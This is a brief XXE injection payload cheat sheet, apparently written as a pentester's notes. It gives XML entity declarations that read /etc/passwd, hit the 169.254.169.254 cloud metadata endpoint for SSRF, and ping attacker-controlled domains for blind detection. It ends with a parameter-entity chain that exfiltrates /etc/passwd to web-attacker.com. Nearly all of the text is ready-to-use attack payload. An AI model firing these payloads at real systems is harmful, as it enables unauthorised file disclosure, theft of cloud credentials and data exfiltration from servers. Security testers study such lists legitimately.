
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> // To view local files

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>   // xxe SSRF

********************************************************************************************
/*BLIND*/

// Send request to a doamain owned by ourself to monitor for HTTP request.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker-controlled-domain">  ]>

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]> // parameter entity 

To exfiltrate data:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
